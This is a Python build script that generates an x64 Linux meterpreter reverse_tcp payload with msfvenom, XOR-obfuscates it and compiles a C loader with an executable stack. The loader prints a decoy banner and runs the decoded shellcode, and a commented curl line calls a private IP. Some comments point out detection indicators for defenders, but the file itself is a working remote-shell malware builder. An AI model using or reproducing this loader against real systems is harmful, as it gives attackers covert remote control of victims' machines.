#!/bin/env python3
from ak import *
import ak
import os
import subprocess
# File name that compile_c() passes to gcc via -o and then chmods to 0o755.
# It is a relative path, so the binary lands in the current working directory.
OUT_FILENAME = 'msf-linux-x64'
# msfvenom command line that main() hands to ak.ShellCode; nothing in this
# file executes it directly. LHOST and LPORT are read from the project's ak
# module when this module is imported (the f-string is evaluated once, here).
# Flags as written: x64 Linux meterpreter reverse_tcp payload, raw output
# (-f raw), no encoder (-e generic/none), byte 0x03 excluded (-b), and a
# 300-second generation timeout (-t).
# NOTE(review): LHOST/LPORT are interpolated unquoted into a command string;
# presumably ak.ShellCode runs it through a shell -- confirm those values can
# only come from operator-controlled configuration.
MSFVENOM_CMD = f"msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST={ak.LHOST} LPORT={ak.LPORT} -f raw -e generic/none -b '\\x03' prependfork=true -t 300"
def generate_c(shellcode):
    """Render the C loader source that embeds the encoded payload.

    Args:
        shellcode: Object exposing ``get_hex_c()``. Its return value is pasted
            between the double quotes of a C string literal, so it is
            presumably a run of ``\\xNN`` escapes (defined in ``ak``; confirm).

    Returns:
        The C source text. The same text is also printed to stdout.
    """
    hex_literal = shellcode.get_hex_c()

    # What the emitted program does, as written in the template below:
    #   - prints a fixed banner string,
    #   - XORs bytes of the embedded buffer with the single-byte key 0x03,
    #   - calls mprotect(PROT_READ|PROT_EXEC) on the page holding the buffer,
    #   - calls the buffer through a function pointer.
    # Defender notes: the banner and the XOR key are constants in the binary,
    # and a fixed single-byte XOR is obfuscation rather than encryption, so
    # static string and byte-pattern rules should match builds from this
    # template. The mprotect call that adds PROT_EXEC to a data page is
    # visible to syscall auditing.
    # Doubled braces are str.format escapes for the literal C braces.
    loader_template = """
#define _GNU_SOURCE
#include <sys/mman.h> // for mprotect #include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
int main (int argc, char **argv)
{{
printf("I love programming.");
// system("curl http://192.168.49.65/iran");
unsigned char *buf = "{xor_shellcode}";
char xor_key = '\\x03';
int arraysize = (int) sizeof(buf);
for (int i=0; i<arraysize-1; i++) {{
buf[i] = buf[i]^xor_key;
}}
intptr_t pagesize = sysconf(_SC_PAGESIZE);
if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
pagesize, PROT_READ|PROT_EXEC))
{{
perror("mprotect");
return -1;
}}
int (*ret)() = (int(*)())buf;
ret();
return 0;
}}
"""
    c_source = loader_template.format(xor_shellcode=hex_literal)
    # Echo the generated source so the operator can inspect what is compiled.
    print(c_source)
    return c_source
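def compile_c(c):
    """Compile C source text with gcc into OUT_FILENAME and mark it executable.

    The source is fed to gcc on stdin (``-x c ... -``), so no intermediate .c
    file is written. gcc's stdout and stderr are merged and printed in full.

    Args:
        c: C source code as a ``str``.

    Raises:
        subprocess.CalledProcessError: gcc exited with a non-zero status. The
            output file is then neither chmod-ed nor reported as written, so a
            stale binary from an earlier run is not mistaken for a new build.
    """
    # '-z execstack' asks the linker to mark the stack executable. The setting
    # is recorded in the ELF GNU_STACK program header, which makes it an easy
    # static triage indicator for binaries built this way.
    gcc_argv = ['gcc', '-x', 'c', '-o', OUT_FILENAME, '-', '-z', 'execstack']

    # run() waits for gcc to exit and drains all of its output. The previous
    # Popen/readline sequence read a single line and never waited, so chmod
    # could run while gcc was still working or after it had failed.
    result = subprocess.run(
        gcc_argv,
        input=c.encode(),
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )
    if result.stdout:
        print(result.stdout.decode(errors='replace'), end='')
    result.check_returncode()

    os.chmod(OUT_FILENAME, 0o755)
    print("Wrote " + OUT_FILENAME)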
def main():
    """Build the payload object, render the C loader source, and compile it."""
    # ShellCode is supplied by the project's ak module (star import). The
    # second argument is the byte 0x03, the same value as the xor_key constant
    # in the C template -- presumably the XOR key; confirm against ak.ShellCode.
    payload = ShellCode(MSFVENOM_CMD, b'\x03')
    loader_source = generate_c(payload)
    compile_c(loader_source)


if __name__ == "__main__":
    main()